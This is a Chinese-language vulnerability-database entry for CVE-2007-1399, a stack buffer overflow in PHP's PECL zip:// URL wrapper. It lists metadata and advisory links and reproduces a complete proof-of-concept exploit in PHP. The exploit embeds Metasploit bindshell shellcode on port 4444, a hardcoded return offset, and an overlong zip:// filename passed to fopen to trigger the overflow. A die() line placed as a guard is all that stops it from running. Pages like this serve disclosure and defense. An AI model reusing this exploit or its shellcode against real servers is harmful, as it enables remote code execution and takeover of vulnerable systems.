PHP Zip "zip://URL封面" 栈缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112402 漏洞类型 缓冲区溢出
发布时间 2007-03-09 更新时间 2007-09-24
CVE编号 CVE-2007-1399 CNNVD-ID CNNVD-200703-326
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/3440
https://www.securityfocus.com/bid/22883
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-326
|漏洞详情
PECLZIP1.8.3及之前版本的zip://URL封面中存在栈缓冲区溢出漏洞。当它和PHP5.2.0和5.2.1版本一起被打包时,远程攻击者可以借助一个长的zip://URL,执行任意代码。
|漏洞EXP
<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //            PHP zip:// URL Wrapper Stack Buffer Overflow            //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  // Offset of a POP EBP, RET inside the PHP binary
  $offset = 0x080d7da3;

  // linux x86 bindshell on port 4444 from Metasploit
  $shellcode = "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
      "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
      "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
      "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
      "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
      "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
      "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";

  // Align the shellcode on 4 bytes      
  while (strlen($shellcode) % 4 != 0) $shellcode .= "X";

  // Convert Offset into String and calculate size
  $str = pack("L", $offset);
  $len = 4096 + 32 - strlen($shellcode) - 400;
  
  // Construct the filename
  $fname = "zip://A".str_repeat("A", 400)."$shellcode".str_repeat($str, $len / 4)."#EXPLOIT";


  
  // Trigger the EXPLOIT could also be a remote URL include
  fopen($fname,"a+");

?>

# milw0rm.com [2007-03-09]
|受影响的产品
SuSE SUSE Linux Enterprise Server 8 + Linux kernel 2.4.21 + Linux kernel 2.4.19 SuSE SUSE Linux Enterprise Server 10 SuSE S
|参考资料

来源:BID
名称:22883
链接:http://www.securityfocus.com/bid/22883
来源:MISC
链接:http://www.php-security.org/MOPB/MOPB-16-2007.html
来源:XF
名称:pecl-url-wrapper-bo(32889)
链接:http://xforce.iss.net/xforce/xfdb/32889
来源:OSVDB
名称:32782
链接:http://www.osvdb.org/32782
来源:VUPEN
名称:ADV-2007-0898
链接:http://www.frsirt.com/english/advisories/2007/0898
来源:DEBIAN
名称:DSA-1330
链接:http://www.debian.org/security/2007/dsa-1330
来源:SECUNIA
名称:25938
链接:http://secunia.com/advisories/25938
来源:SECUNIA
名称:24514
链接:http://secunia.com/advisories/24514
来源:SECUNIA
名称:24471
链接:http://secunia.com/advisories/24471
来源:SUSE
名称:SUSE-SA:2007:020
链接:http://lists.suse.com/archive/suse-security-announce/2007-Mar/0003.html